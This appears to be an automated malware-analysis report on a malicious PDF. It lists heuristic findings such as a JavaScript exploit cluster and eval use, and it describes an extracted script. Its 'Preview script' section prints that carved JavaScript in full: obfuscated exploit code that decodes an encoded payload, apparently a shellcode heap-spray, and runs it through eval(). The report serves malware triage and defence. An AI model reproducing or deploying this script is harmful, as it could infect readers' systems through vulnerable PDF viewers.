MALICIOUS
166
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript with an eval() call, indicating an attempt to execute obfuscated code. The JavaScript stream is large and appears to be heavily obfuscated, suggesting it's designed to download and execute a second-stage payload. The presence of PDF_JAVASCRIPT and PDF_EVAL heuristics further supports this conclusion. The file's metadata indicates it was authored by 'dluMZt', which may be a tool or packer.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
%BLTeT%B41g1%BZg48%BgT8T%BLTVz%B8Wez%B((ye%BeLLy%B8tzV%Bgeg8%B8T8g%B4(eL%Be8WZ%BeeLZ%Bz4Ve%BVyW4%BWZ1Z%BVy1Z%B8TTV%B}zCg%B8C1Z%B1Z4Z%B(CVy%BCg8T%B8V1Z%B8T1Z%BVeg4%BgLVg%B8(8t%BeVWt%BeWee%BV4eW%B4CVL%B4W4g%B8(4e%BtZ1}%BtWtZ%Bg(C4%B1Zg(%B1LCW%BCe1e%BtC18%B1zg8%B1118%Bg(1(%B1T1g%B1t1(%B1Tg(%B1e1(%Bg81Z%B1}tW%BC(tW%B1Z1z%BCzCL%BWWCt\"J;\nllM\nlls2msl plo81YmdNPWr1<pqDuNl==lgJE\nllll4qRhHr9 I(7Gjz.xl=lBYsmxdUso\"%BZCZC%BZCZC%BZCZC%BW(8V%BCCyV%B11Tz%B}WVz%B}WWe%B8(CC%B8gZC%B8V(4%B8}Wy%B((8T%B((((%B}Vt … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x23D | 8116 bytes |
SHA-256: d9a8709998bbed5453d0ccf338b11aedfae932e9f9b3adfff1bb92fd29970e91 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s). 124 of 169 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function HG8WWQTf2KSLiFy1QS(HG8WWQTf2KSLiFy1QS,iqqojNCSlhKcoRbAn) {var qvCfot3=HG8WWQTf2KSLiFy1QS. substr (iqqojNCSlhKcoRbAn, 1);return qvCfot3;}/*H5Xt9y7k|n0SuHyjrd8w|J4S47xjrqxylKi*/function UbgmPrMq(yxOHhM5VxmaLb83rG2IZ) {/*AfLYJCq3Jed18b|kki3ffqEMX2B9Ck|BGwaPyHJ8lmzkE*/var UuD0WSij9gXxvf = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*LpBEKhvOuIGv[JWrLcd]rSt0QVdF5iiHNk*//*XH7m2Fto|AA4EcXrK|aB6veBrCkyQLAnT*/var AaqvCH7eF1 /*PLC9zP2zJ7ShocNEdJz8[hBwVR7W]RTLcWKRmCHwAZTo2hsW*/= new String("wcoJEMlbi4VTL8({D3>vrGH75IN6<fPAjQKdXxhsp0n u,29Y.URamOBSqk)FWegCZy1t}z");/*iV2FWobomxj3HvV|AnG8v28LMnDt|aZ4vSAI6bw*/for(MuUmVoXZ=0;MuUmVoXZ<UuD0WSij9gXxvf.length;MuUmVoXZ++) {if(yxOHhM5VxmaLb83rG2IZ == HG8WWQTf2KSLiFy1QS(AaqvCH7eF1, MuUmVoXZ)) {/*PWbWHx0Db7CM0[XCobw]AM5ne*/return HG8WWQTf2KSLiFy1QS(UuD0WSij9gXxvf, MuUmVoXZ);/*vaXh9m4b9BO0EqxG2oH <rwsdwkprN]n9kAhkn*/}}return yxOHhM5VxmaLb83rG2IZ;}/*BmcQch6Qoz5w[miyFVY]Cm5qmgqJGTkH6DYYl*//*pQKkDQMmES|dDAG9qsfX1lqctmfHBHc|XnSa3fC8xAc1Ai0r*/var TJkecvDik4z3rXjX = new String;var IlEaN = new String("\nSdalYrPeSX<t GRhIsWvl=lYsql4aad)oJ;\nSdalv3G6rWyPRCfrPRYp;\npBYxO .Yl930}BW8hA1{quIDPo8h)yYCdh1yFXS9D}ildk(etfhxKOK>va.ZJE\nllqn 2slo8h)yYCdh1yFXS9D}b2sY0Onl*lglwldk(etfhxKOK>va.ZJE\nllll8h)yYCdh1yFXS9D}l+=l8h)yYCdh1yFXS9D};\nllM\nll8h)yYCdh1yFXS9D}l=l8h)yYCdh1yFXS9D}bmBXmOa Y0oWildk(etfhxKOK>va.Zl/lgJ;\nllasOBaYl8h)yYCdh1yFXS9D};\nM\npBYxO .Yl.9z3U qSYSj .RYo81YmdNPWr1<pqDuNJE\nllSdalTmuBX0R7xHtvVkzkl=lWkWxWxWxWx;\nllSdal4qRhHr9 I(7Gjz.xl=lBYsmxdUso\"%BZCZC%BZCZC%BZCZC%BW(8V%BCCyV%B11Tz%B}WVz%B}WWe%B8(CC%B8gZC%B8V(4%B8}Wy%B((8T%B((((%B}Vt(%BL(Z8%B8(8(%B1Z8(%B8C4(%Bz(1Z%BZg(C%Bz(1Z%B188t%B8(WC%B8(8V%B1Z8(%BVzWC%B1e}t%B8e4e%BWtWC%B8(ee%B8(8(%B4411%BVz8V%Btt}t%B1yee%BWt8e%B8(e(%B8(8(%B4411%BVz8t%BT4}t%BeWy(%BWtgL%B8(WL%B8(8(%B4411%BVz8C%BWW}t%BW(ge%BWt}(%B8(CV%B8(8(%B4411%BVz((%Bg8}t%BW4z1%BWtyt%B8(gz%B8(8(%B4411%B4((V%BLt1(%Bz4gT%B11ey%B(t44%B8}W1%B8(88%BVe8(%Bz411%B1ZTV%B8V44%B88}y%B1ZV1%B(tV4%BWtVz%B8(1Z%B8(8(%B}tV(%B(yLz%Bz(TW%Bt}Wt%B8(8(%B118(%B(C44%Bg41Z%Bg(1T%B11V(%BT(44%BeW}t%B8(8(%BV(8(%B441Z%B}y(V%BV18L%BV41Z%BWt(t%B8(}8%B8(8(%B448T%Bg}T(%BVC8(%BTeze%Bg}}4%B8V4(%B}4zt%B8(8(%Bz4eW%B1ZT(%B8C44%B88}y%B1ZV1%B(tV4%B4(Wt%B8(8(%B}y8(%BVt8}%B448T%BLTTV%BVTCZ%BeWVT%BT(z4%BVTV(%B441Z%B}y(C%BV184%BV41Z%BWt(t%B8(TT%B8(8(%B8(}y%Bz4eW%B1ZT(%B8t44%B8L}y%B1ZV1%B(tV4%B((Wt%B8(8(%B}y8(%B1ZeW%B((44%B88}y%B1ZV1%B(tV4%B8(Wt%B8(8(%B488(%BVLVZ%BW88T%BW88T%BW88T%BW88T%BWC1T%BVy8V%B1ZVT%BWLCy%BVLe}%BW(eW%B1ZV4%B1ZWC%B8tzg%BVg1Z%BVz8C%BzT1Z%B1ZLC%B(ezV%B8Tzt%BVzeT%Bzz1Z%B8TT(%BLTeT%B41g1%BZg48%BgT8T%BLTVz%B8Wez%B((ye%BeLLy%B8tzV%Bgeg8%B8T8g%B4(eL%Be8WZ%BeeLZ%Bz4Ve%BVyW4%BWZ1Z%BVy1Z%B8TTV%B}zCg%B8C1Z%B1Z4Z%B(CVy%BCg8T%B8V1Z%B8T1Z%BVeg4%BgLVg%B8(8t%BeVWt%BeWee%BV4eW%B4CVL%B4W4g%B8(4e%BtZ1}%BtWtZ%Bg(C4%B1Zg(%B1LCW%BCe1e%BtC18%B1zg8%B1118%Bg(1(%B1T1g%B1t1(%B1Tg(%B1e1(%Bg81Z%B1}tW%BC(tW%B1Z1z%BCzCL%BWWCt\"J;\nll plo81YmdNPWr1<pqDuNl==leJE\nllllTmuBX0R7xHtvVkzkl=lWkCWCWCWCW;\nllll4qRhHr9 I(7Gjz.xl=lBYsmxdUso\"%BZCZC%BZCZC%BZCZC%BW(8V%BCCyV%B11Tz%B}WVz%B}WWe%B8(CC%B8gZC%B8V(4%B8}Wy%B((8T%B((((%B}Vt(%BL(Z8%B8(8(%B1Z8(%B8C4(%Bz(1Z%BZg(C%Bz(1Z%B188t%B8(WC%B8(8V%B1Z8(%BVzWC%B1e}t%B8e4e%BWtWC%B8(ee%B8(8(%B4411%BVz8V%Btt}t%B1yee%BWt8e%B8(e(%B8(8(%B4411%BVz8t%BT4}t%BeWy(%BWtgL%B8(WL%B8(8(%B4411%BVz8C%BWW}t%BW(ge%BWt}(%B8(CV%B8(8(%B4411%BVz((%Bg8}t%BW4z1%BWtyt%B8(gz%B8(8(%B4411%B4((V%BLt1(%Bz4gT%B11ey%B(t44%B8}W1%B8(88%BVe8(%Bz411%B1ZTV%B8V44%B88}y%B1ZV1%B(tV4%BWtVz%B8(1Z%B8(8(%B}tV(%B(yLz%Bz(TW%Bt}Wt%B8(8(%B118(%B(C44%Bg41Z%Bg(1T%B11V(%BT(44%BeW}t%B8(8(%BV(8(%B441Z%B}y(V%BV18L%BV41Z%BWt(t%B8(}8%B8(8(%B448T%Bg}T(%BVC8(%BTeze%Bg}}4%B8V4(%B}4zt%B8(8(%Bz4eW%B1ZT(%B8C44%B88}y%B1ZV1%B(tV4%B4(Wt%B8(8(%B}y8(%BVt8}%B448T%BLTTV%BVTCZ%BeWVT%BT(z4%BVTV(%B441Z%B}y(C%BV184%BV41Z%BWt(t%B8(TT%B8(8(%B8(}y%Bz4eW%B1ZT(%B8t44%B8L}y%B1ZV1%B(tV4%B((Wt%B8(8(%B}y8(%B1ZeW%B((44%B88}y%B1ZV1%B(tV4%B8(Wt%B8(8(%B488(%BVLVZ%BW88T%BW88T%BW88T%BW88T%BWC1T%BVy8V%B1ZVT%BWLCy%BVLe}%BW(eW%B1ZV4%B1ZWC%B8tzg%BVg1Z%BVz8C%BzT1Z%B1ZLC%B(ezV%B8Tzt%BVzeT%Bzz1Z%B8TT(%BLTeT%B41g1%BZg48%BgT8T%BLTVz%B8Wez%B((ye%BeLLy%B8tzV%Bgeg8%B8T8g%B4(eL%Be8WZ%BeeLZ%Bz4Ve%BVyW4%BWZ1Z%BVy1Z%B8TTV%B}zCg%B8C1Z%B1Z4Z%B(CVy%BCg8T%B8V1Z%B8T1Z%BVeg4%BgLVg%B8(8t%BeVWt%BeWee%BV4eW%B4CVL%B4W4g%B8(4e%BtZ1}%BtWtZ%Bg(C4%B1Zg(%B1LCW%BCe1e%BtC18%B1zg8%B1118%Bg(1(%B1T1g%B1t1(%B1Tg(%B1e1(%Bg81Z%B1}tW%BC(tW%B1Z1z%BCzCL%BWWCt\"J;\nllM\nlls2msl plo81YmdNPWr1<pqDuNl==lgJE\nllll4qRhHr9 I(7Gjz.xl=lBYsmxdUso\"%BZCZC%BZCZC%BZCZC%BW(8V%BCCyV%B11Tz%B}WVz%B}WWe%B8(CC%B8gZC%B8V(4%B8}Wy%B((8T%B((((%B}Vt(%BL(Z8%B8(8(%B1Z8(%B8C4(%Bz(1Z%BZg(C%Bz(1Z%B188t%B8(WC%B8(8V%B1Z8(%BVzWC%B1e}t%B8e4e%BWtWC%B8(ee%B8(8(%B4411%BVz8V%Btt}t%B1yee%BWt8e%B8(e(%B8(8(%B4411%BVz8t%BT4}t%BeWy(%BWtgL%B8(WL%B8(8(%B4411%BVz8C%BWW}t%BW(ge%BWt}(%B8(CV%B8(8(%B4411%BVz((%Bg8}t%BW4z1%BWtyt%B8(gz%B8(8(%B4411%B4((V%BLt1(%Bz4gT%B11ey%B(t44%B8}W1%B8(88%BVe8(%Bz411%B1ZTV%B8V44%B88}y%B1ZV1%B(tV4%BWtVz%B8(1Z%B8(8(%B}tV(%B(yLz%Bz(TW%Bt}Wt%B8(8(%B118(%B(C44%Bg41Z%Bg(1T%B11V(%BT(44%BeW}t%B8(8(%BV(8(%B441Z%B}y(V%BV18L%BV41Z%BWt(t%B8(}8%B8(8(%B448T%Bg}T(%BVC8(%BTeze%Bg}}4%B8V4(%B}4zt%B8(8(%Bz4eW%B1ZT(%B8C44%B88}y%B1ZV1%B(tV4%B4(Wt%B8(8(%B}y8(%BVt8}%B448T%BLTTV%BVTCZ%BeWVT%BT(z4%BVTV(%B441Z%B}y(C%BV184%BV41Z%BWt(t%B8(TT%B8(8(%B8(}y%Bz4eW%B1ZT(%B8t44%B8L}y%B1ZV1%B(tV4%B((Wt%B8(8(%B}y8(%B1ZeW%B((44%B88}y%B1ZV1%B(tV4%B8(Wt%B8(8(%B488(%BVLVZ%BW88T%BW88T%BW88T%BW88T%BWC1T%BVy8V%B1ZVT%BWLCy%BVLe}%BW(eW%B1ZV4%B1ZWC%B8tzg%BVg1Z%BVz8C%BzT1Z%B1ZLC%B(ezV%B8Tzt%BVzeT%Bzz1Z%B8TT(%BLTeT%B41g1%BZg48%BgT8T%BLTVz%B8Wez%B((ye%BeLLy%B8tzV%Bgeg8%B8T8g%B4(eL%Be8WZ%BeeLZ%Bz4Ve%BVyW4%BWZ1Z%BVy1Z%B8TTV%B}zCg%B8C1Z%B1Z4Z%B(CVy%BCg8T%B8V1Z%B8T1Z%BVeg4%BgLVg%B8(8t%BeVWt%BeWee%BV4eW%B4CVL%B4W4g%B8(4e%BtZ1}%BtWtZ%Bg(C4%B1Zg(%B1LCW%BCe1e%BtC18%B1zg8%B1118%Bg(1(%B1T1g%B1t1(%B1Tg(%B1e1(%Bg81Z%B1}tW%BC(tW%B1Z1z%BCzCL%BWWCt\"J;\nllM\nllSdalGjjXLHeR,}4qy>O}l=lWkZWWWWW;\nllSdalGu,h1ArP9,mvm0qOl=l4qRhHr9 I(7Gjz.xb2sY0Onl*lg;\nllSdaldk(etfhxKOK>va.Zl=lGjjXLHeR,}4qy>O}l-loGu,h1ArP9,mvm0qOl+lWkC}J;\nllSdal8h)yYCdh1yFXS9D}l=lBYsmxdUso\"%BzWzW%BzWzW\"J;\nll8h)yYCdh1yFXS9D}l=l930}BW8hA1{quIDPo8h)yYCdh1yFXS9D}ildk(etfhxKOK>va.ZJ;\nllSdal><P6RP3Xx<j09NYgl=loTmuBX0R7xHtvVkzkl-lWkZWWWWWJl/lGjjXLHeR,}4qy>O};\nllp.aloSdalpQs{1e9a2sVsrzjdl=lW;lpQs{1e9a2sVsrzjdlwl><P6RP3Xx<j09NYg;lpQs{1e9a2sVsrzjdl++lJE\nllllYrPeSX<t GRhIsWv[pQs{1e9a2sVsrzjd]l=l8h)yYCdh1yFXS9D}l+l4qRhHr9 I(7Gjz.x;\nllM\nM\npBYxO .YlrZC6QryV.XmXC0xLoJE\nllSdal5D<>3(4ZBGn{P(R}l=lW;\nllSdalxmdaLsCC{Bh>d{j.l=ldUUbS sqsaPsam .YbO.6Oa Y0oJ;\nlldUUbx2sda< 9s7BOov3G6rWyPRCfrPRYpJ;\n\nll ploxmdaLsCC{Bh>d{j.lwltbeJE\nllll.9z3U qSYSj .RYoWJ;\nllllSdal3gza{>SV0hNVmD3Vl=lBYsmxdUso\"%BWxWx%BWxWx\"J;\nllllqn 2slo3gza{>SV0hNVmD3Vb2sY0OnlwlZZzygJ3gza{>SV0hNVmD3Vl+=l3gza{>SV0hNVmD3V;\nllllOn mlbx.22dX6O.asl=lT.22dXbx.22sxO89d 23Yp.oE\nllllllmBXul:l\"\"il9m0l:l3gza{>SV0hNVmD3V\nllllM\nllllJ;\nllM\n ploxmdaLsCC{Bh>d{j.lc=lzJE\nllllOa)lE\n plodUUbh.xbT.22dXb0sO3x.YJE\nllllllll.9z3U qSYSj .RYogJ;\nllllllllSdal OC7j1N.ey}drs5Bl=lBYsmxdUso\"%Wz\"J;\nllllllllqn 2slo OC7j1N.ey}drs5Bb2sY0OnlwlWkZWWWJ OC7j1N.ey}drs5Bl+=l OC7j1N.ey}drs5B;\nllllllll OC7j1N.ey}drs5Bl=l\"Hb\"l+l OC7j1N.ey}drs5B;\ndUUbh.xbT.22dXb0sO3x.Yo OC7j1N.ey}drs5BJ;\nllllllll5D<>3(4ZBGn{P(R}l=le;\nllllllM\nlllllls2mslE\nllllllll5D<>3(4ZBGn{P(R}l=le;\nllllllM\nllllM\nllllxdOxnlosJE\nllllll5D<>3(4ZBGn{P(R}l=le;\nllllM\nllll plo5D<>3(4ZBGn{P(R}l==leJE\nllllll plooxmdaLsCC{Bh>d{j.lc=ltbe&&lxmdaLsCC{Bh>d{j.lwlzJJE\nllllllll.9z3U qSYSj .RYoeJ;\nllllllllSdalSj2qa0zj>d VagHCl=l\"egzzzzzzzzzzzzzzzzzz\";\nllllllllp.aloLIN6Pm{Pk7t3ZAT l=lW;lLIN6Pm{Pk7t3ZAT lwlgt1;lLIN6Pm{Pk7t3ZAT l++lJE\nllllllllllSj2qa0zj>d VagHCl+=l\"}\";\nllllllllM\nllllllllBO 2bUa YOpo\"%ZyWWWp\"ilSj2qa0zj>d VagHCJ;\nllllllM\nllllM\nllM\nM\ndUUbkkpSsY6kHVW(TA3}l=lrZC6QryV.XmXC0xL;\nv3G6rWyPRCfrPRYpl=ldUUbmsO< 9s7BOo\"dUUbkkpSsY6kHVW(TA3}oJ\"ileWJ;\n");/*WEJ7ulrXH{ZOSGm5ZDz4FxrFPjGy}xGw1Pum1bA9*//*ZOjg0e54T|AHiFXHMMi9SU1iFdah|Zy3oXae2WZMM*/for(lqP2HQgykpYEIK=0;lqP2HQgykpYEIK<IlEaN.length;lqP2HQgykpYEIK++)TJkecvDik4z3rXjX += UbgmPrMq(HG8WWQTf2KSLiFy1QS(IlEaN,lqP2HQgykpYEIK));eval(TJkecvDik4z3rXjX);/*Tuer2q3aqLv[u1BKYfkNZOl0t]NIpah9LCqDtj*/
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.